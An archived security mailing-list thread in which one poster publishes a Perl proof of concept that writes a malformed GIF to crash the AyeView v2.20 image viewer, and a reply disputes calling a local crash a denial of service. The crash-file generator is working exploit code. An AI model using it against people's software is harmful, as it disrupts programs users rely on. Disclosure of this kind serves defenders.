AyeView v2.20 (malformed gif image) DoS Exploit

View: New views

2 Messages — Rating Filter: Alert me

AyeView v2.20 (malformed gif image) DoS Exploit

by crimson.loyd :: Rate this Message:

Reply to Author | View Threaded | Show Only this Message

Name : AyeView v2.20 (malformed gif image) DoS Exploit
Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@...
Download: : http://www.ayeview.com/downloads.htm
Greetz : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,
Katharsis, all from #dark-coders and others;]

PoC:

#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4

my $code="\x47\x49\x46\x38\x39\x61\xff\xff\xff\xff\x0e".
"\x00\x00\x2c\x00\x00\x00\x00\xff\xff\xff\xff\x00";
my $file="open_me.gif";

open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf, www.dark-coders.pl"

Re: AyeView v2.20 (malformed gif image) DoS Exploit

by 3APA3A :: Rate this Message:

Reply to Author | View Threaded | Show Only this Message

Dear crimson.loyd@...,

--Saturday, October 4, 2008, 11:49:42 PM, you wrote to bugtraq@...:

clgc> Name : AyeView v2.20 (malformed gif image) DoS Exploit

DoS vulnerability in computer security is blocking legitimate access to
some data or service. What kind of service do you block with this
vulnerability?

--
~/ZARAZA http://securityvulns.com/

LightInTheBox - Buy quality products at wholesale price!